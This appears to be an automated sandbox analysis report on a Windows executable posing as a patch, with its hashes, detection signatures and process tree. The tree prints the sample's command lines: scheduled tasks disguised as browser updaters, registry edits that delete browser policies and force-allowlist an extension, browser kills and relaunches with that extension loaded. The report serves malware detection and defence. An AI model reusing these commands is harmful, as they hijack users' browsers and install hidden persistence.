Edit tour
Windows
Analysis Report
TriMPFPatch56form20230426.exe
Overview
General Information
| Sample Name: | TriMPFPatch56form20230426.exe |
| Analysis ID: | 854598 |
| MD5: | a7a5c04005c17d1fa983f835cffbd183 |
| SHA1: | c79fb9d8fdbead904459bd9d1ffadf6ce43c9374 |
| SHA256: | 3494f9352c5bd48f55caddbbb63515f8058763e28f8e5f8fa5411a5de835ca8e |
| Infos: | |
 | |
Detection
| Score: | 48 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Obfuscated command line found
Found potential ransomware demand text
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Installs a Chrome extension
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64native
TriMPFPatch56form20230426.exe (PID: 1608 cmdline: C:\Users\u ser\Deskto p\TriMPFPa tch56form2 0230426.ex e MD5: A7A5C04005C17D1FA983F835CFFBD183) - TriMPFPatch56form20230426.tmp (PID: 1800 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\is-KJ9 1B.tmp\Tri MPFPatch56 form202304 26.tmp" /S L5="$40098 ,857904,78 0800,C:\Us ers\user\D esktop\Tri MPFPatch56 form202304 26.exe" MD5: A93A63A9E371AF57AE7FF4D3D1A8068C) - TriMPFPatch56form20230426.exe (PID: 2580 cmdline:
"C:\Users\ user\Deskt op\TriMPFP atch56form 20230426.e xe" /SILEN T MD5: A7A5C04005C17D1FA983F835CFFBD183) - TriMPFPatch56form20230426.tmp (PID: 2764 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\is-CDM 75.tmp\Tri MPFPatch56 form202304 26.tmp" /S L5="$C0240 ,857904,78 0800,C:\Us ers\user\D esktop\Tri MPFPatch56 form202304 26.exe" /S ILENT MD5: A93A63A9E371AF57AE7FF4D3D1A8068C) 
EdgeInstall.exe (PID: 3212 cmdline: "C:\Users\ user\AppDa ta\Local\M icroApp\Ed geInstall. exe" insta ll MD5: BC44C3F3B1E233CCF83E964193F4CC0D) 
cmd.exe (PID: 3440 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \MicroApp\ edge.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3416 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) 
schtasks.exe (PID: 4652 cmdline: schtasks.e xe /Create /XML "C:\ Users\user \AppData\L ocal\Micro App\reg.xm l" /tn MSE dgeUpdate MD5: 796B784E98008854C27F4B18D287BA30) - cmd.exe (PID: 4728 cmdline:
C:\Windows \system32\ cmd.exe" / C ""C:\Use rs\user\Ap pData\Loca l\MicroApp \edge.bat" install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4988 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - schtasks.exe (PID: 5860 cmdline:
schtasks.e xe /Create /XML "C:\ Users\user \AppData\L ocal\Micro App\reg.xm l" /tn MSE dgeUpdate MD5: 796B784E98008854C27F4B18D287BA30) - cmd.exe (PID: 408 cmdline:
C:\Windows \system32\ cmd.exe" / C ""C:\Use rs\user\Ap pData\Loca l\MicroApp \reg.bat" install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 384 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - schtasks.exe (PID: 6608 cmdline:
schtasks.e xe /Create /XML "C:\ Users\user \AppData\L ocal\Micro App\reg.xm l" /tn MSE dgeUpdate MD5: 796B784E98008854C27F4B18D287BA30) - ChromeInstall.exe (PID: 6624 cmdline:
"C:\Users\ user\AppDa ta\Local\S erviceApp\ ChromeInst all.exe" i nstall MD5: CFBB52F1BD761012D807812DB9566A8B) - cmd.exe (PID: 3352 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \ServiceAp p\chrome.b at" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4780 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - schtasks.exe (PID: 10040 cmdline:
schtasks.e xe /Create /XML "C:\ Users\user \AppData\L ocal\Servi ceApp\reg. xml" /tn C hromeUpdat e MD5: 796B784E98008854C27F4B18D287BA30) - cmd.exe (PID: 2680 cmdline:
C:\Windows \system32\ cmd.exe" / C ""C:\Use rs\user\Ap pData\Loca l\ServiceA pp\chrome. bat" insta ll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3544 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - schtasks.exe (PID: 10196 cmdline:
schtasks.e xe /Create /XML "C:\ Users\user \AppData\L ocal\Servi ceApp\reg. xml" /tn C hromeUpdat e MD5: 796B784E98008854C27F4B18D287BA30) - cmd.exe (PID: 10164 cmdline:
C:\Windows \system32\ cmd.exe" / C ""C:\Use rs\user\Ap pData\Loca l\ServiceA pp\reg.bat " install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 10168 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - schtasks.exe (PID: 9964 cmdline:
schtasks.e xe /Create /XML "C:\ Users\user \AppData\L ocal\Servi ceApp\reg. xml" /tn C hromeUpdat e MD5: 796B784E98008854C27F4B18D287BA30) 
chrome.exe (PID: 10120 cmdline: "C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t https:// getfiles.w iki/welcom e.php MD5: 464953824E644F10FFDC9E093FD18F94) - chrome.exe (PID: 412 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -field-tri al-handle= 1744,84669 6545301365 7905,15386 2799997242 5382,13107 2 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction -- lang=en-US --service -sandbox-t ype=none - -mojo-plat form-chann el-handle= 2012 /pref etch:8 MD5: 464953824E644F10FFDC9E093FD18F94)
- EdgeInstall.exe (PID: 372 cmdline:
C:\Users\u ser\AppDat a\Local\Mi croApp\Edg eInstall.e xe MD5: BC44C3F3B1E233CCF83E964193F4CC0D) - cmd.exe (PID: 808 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \MicroApp\ edge.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1268 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - reg.exe (PID: 5548 cmdline:
REG DELETE HKLM\SOFT WARE\Polic ies\Micros oft\Edge / f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 6736 cmdline:
REG DELETE HKLM\SOFT WARE\Micro soft\Edge\ Extensions \macjkjgie eoakdlmmfe fgmldohgdd pkj /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 10096 cmdline:
REG DELETE HKLM\SOFT WARE\WOW64 32Node\Mic rosoft\Edg e\Extensio ns\macjkjg ieeoakdlmm fefgmldohg ddpkj /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 1704 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Edge\Ext ensionInst allAllowli st" /v "3" /t REG_SZ /d macjkj gieeoakdlm mfefgmldoh gddpkj /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 3484 cmdline:
REG ADD "H KLM\SOFTWA RE\Microso ft\Edge\Ex tensions\m acjkjgieeo akdlmmfefg mldohgddpk j" /v "pat h" /t REG_ SZ /d "C:\ Users\user \AppData\L ocal\Micro App\apps-h elper\apps .crx" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 10216 cmdline:
REG ADD "H KLM\SOFTWA RE\Microso ft\Edge\Ex tensions\m acjkjgieeo akdlmmfefg mldohgddpk j" /v "ver sion" /t R EG_SZ /d 1 .0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 10180 cmdline:
REG ADD "H KLM\SOFTWA RE\WOW6432 Node\Polic ies\Micros oft\Edge\E xtensionIn stallAllow list" /v " 3" /t REG_ SZ /d macj kjgieeoakd lmmfefgmld ohgddpkj / f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 10152 cmdline:
REG ADD "H KLM\SOFTWA RE\WOW6432 Node\Micro soft\Edge\ Extensions \macjkjgie eoakdlmmfe fgmldohgdd pkj" /v "p ath" /t RE G_SZ /d "C :\Users\us er\AppData \Local\Mic roApp\apps -helper\ap ps.crx" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 4532 cmdline:
REG ADD "H KLM\SOFTWA RE\WOW6432 Node\Micro soft\Edge\ Extensions \macjkjgie eoakdlmmfe fgmldohgdd pkj" /v "v ersion" /t REG_SZ /d 1.0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - taskkill.exe (PID: 1720 cmdline:
taskkill / F /IM msed ge.exe /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) 
msedge.exe (PID: 1784 cmdline: "C:\Progra m Files (x 86)\Micros oft\EdgeCo re\94.0.99 2.31\msedg e.exe" --p rofile-dir ectory="De fault" --n o-startup- window --l oad-extens ion="C:\Us ers\user\A ppData\Loc al\MicroAp p\apps-hel per" --hid e-crash-re store-bubb le MD5: 40AAE14A5C86EA857FA6E5FED689C48E) - msedge.exe (PID: 10320 cmdline:
"C:\Progra m Files (x 86)\Micros oft\EdgeCo re\94.0.99 2.31\msedg e.exe" --t ype=crashp ad-handler "--user-d ata-dir=C: \Users\use r\AppData\ Local\Micr osoft\Edge \User Data " /prefetc h:7 --moni tor-self - -monitor-s elf-argume nt=--type= crashpad-h andler "-- monitor-se lf-argumen t=--user-d ata-dir=C: \Users\use r\AppData\ Local\Micr osoft\Edge \User Data " --monito r-self-arg ument=/pre fetch:7 -- monitor-se lf-annotat ion=ptype= crashpad-h andler "-- database=C :\Users\us er\AppData \Local\Mic rosoft\Edg e\User Dat a\Crashpad " --annota tion=IsOff icialBuild =1 --annot ation=chan nel= --ann otation=ch romium-ver sion=94.0. 4606.61 "- -annotatio n=exe=C:\P rogram Fil es (x86)\M icrosoft\E dgeCore\94 .0.992.31\ msedge.exe " --annota tion=plat= Win64 "--a nnotation= prod=Micro soft Edge" --annotat ion=ver=94 .0.992.31 --initial- client-dat a=0xdc,0x1 00,0x104,0 xb8,0x108, 0x7ff992a9 7718,0x7ff 992a97728, 0x7ff992a9 7738 MD5: 40AAE14A5C86EA857FA6E5FED689C48E) - msedge.exe (PID: 10400 cmdline:
"C:\Progra m Files (x 86)\Micros oft\EdgeCo re\94.0.99 2.31\msedg e.exe" --t ype=crashp ad-handler "--user-d ata-dir=C: \Users\use r\AppData\ Local\Micr osoft\Edge \User Data " /prefetc h:7 --no-p eriodic-ta sks --moni tor-self-a nnotation= ptype=cras hpad-handl er "--data base=C:\Us ers\user\A ppData\Loc al\Microso ft\Edge\Us er Data\Cr ashpad" -- annotation =IsOfficia lBuild=1 - -annotatio n=channel= --annotat ion=chromi um-version =94.0.4606 .61 "--ann otation=ex e=C:\Progr am Files ( x86)\Micro soft\EdgeC ore\94.0.9 92.31\msed ge.exe" -- annotation =plat=Win6 4 "--annot ation=prod =Microsoft Edge" --a nnotation= ver=94.0.9 92.31 --in itial-clie nt-data=0x 168,0x16c, 0x170,0x16 4,0x178,0x 7ff7d75fae b0,0x7ff7d 75faec0,0x 7ff7d75fae d0 MD5: 40AAE14A5C86EA857FA6E5FED689C48E) - timeout.exe (PID: 10252 cmdline:
timeout 1 MD5: 100065E21CFBBDE57CBA2838921F84D6) - timeout.exe (PID: 10548 cmdline:
timeout 1 MD5: 100065E21CFBBDE57CBA2838921F84D6) - timeout.exe (PID: 11020 cmdline:
timeout 1 MD5: 100065E21CFBBDE57CBA2838921F84D6)
- ChromeInstall.exe (PID: 3420 cmdline:
C:\Users\u ser\AppDat a\Local\Se rviceApp\C hromeInsta ll.exe MD5: CFBB52F1BD761012D807812DB9566A8B) - cmd.exe (PID: 10236 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \ServiceAp p\chrome.b at" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 10312 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - reg.exe (PID: 10380 cmdline:
REG DELETE HKLM\SOFT WARE\Polic ies\Google \Chrome /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 10468 cmdline:
REG DELETE HKLM\SOFT WARE\Googl e\Chrome\E xtensions\ macjkjgiee oakdlmmfef gmldohgddp kj /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 10492 cmdline:
REG DELETE HKLM\SOFT WARE\WOW64 32Node\Goo gle\Chrome \Extension s\macjkjgi eeoakdlmmf efgmldohgd dpkj /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 10520 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Google\C hrome\Exte nsionInsta llAllowlis t" /v "3" /t REG_SZ /d macjkjg ieeoakdlmm fefgmldohg ddpkj /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 10568 cmdline:
REG ADD "H KLM\SOFTWA RE\Google\ Chrome\Ext ensions\ma cjkjgieeoa kdlmmfefgm ldohgddpkj " /v "path " /t REG_S Z /d "C:\U sers\user\ AppData\Lo cal\Servic eApp\apps- helper\app s.crx" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 10616 cmdline:
REG ADD "H KLM\SOFTWA RE\Google\ Chrome\Ext ensions\ma cjkjgieeoa kdlmmfefgm ldohgddpkj " /v "vers ion" /t RE G_SZ /d 1. 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 10724 cmdline:
REG ADD "H KLM\SOFTWA RE\WOW6432 Node\Polic ies\Google \Chrome\Ex tensionIns tallAllowl ist" /v "3 " /t REG_S Z /d macjk jgieeoakdl mmfefgmldo hgddpkj /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 10764 cmdline:
REG ADD "H KLM\SOFTWA RE\WOW6432 Node\Googl e\Chrome\E xtensions\ macjkjgiee oakdlmmfef gmldohgddp kj" /v "pa th" /t REG _SZ /d "C: \Users\use r\AppData\ Local\Serv iceApp\app s-helper\a pps.crx" / f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 10784 cmdline:
REG ADD "H KLM\SOFTWA RE\WOW6432 Node\Googl e\Chrome\E xtensions\ macjkjgiee oakdlmmfef gmldohgddp kj" /v "ve rsion" /t REG_SZ /d 1.0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - taskkill.exe (PID: 10852 cmdline:
taskkill / F /IM chro me.exe /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - chrome.exe (PID: 11028 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --pr ofile-dire ctory="Def ault" --no -startup-w indow --lo ad-extensi on="C:\Use rs\user\Ap pData\Loca l\ServiceA pp\apps-he lper" --hi de-crash-r estore-bub ble MD5: 464953824E644F10FFDC9E093FD18F94) - chrome.exe (PID: 11240 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -field-tri al-handle= 1684,15240 0122892363 70736,6312 2719805781 76923,1310 72 --lang= en-US --se rvice-sand box-type=n one --mojo -platform- channel-ha ndle=2076 /prefetch: 8 MD5: 464953824E644F10FFDC9E093FD18F94) - timeout.exe (PID: 11104 cmdline:
timeout 5 MD5: 100065E21CFBBDE57CBA2838921F84D6)
- cleanup
⊘No configs have been found
⊘No yara matches
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |   |
|---|
| Source: | Virustotal: | Perma Link | ||
| Source: | ReversingLabs: | |||
| Source: | Avira: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | Static PE information: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Directory created: | Jump to behavior | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Code function: | |